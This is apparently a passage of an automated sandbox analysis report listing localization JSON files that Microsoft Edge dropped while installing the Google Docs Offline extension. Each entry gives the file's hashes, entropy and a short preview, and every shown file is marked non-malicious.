                                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
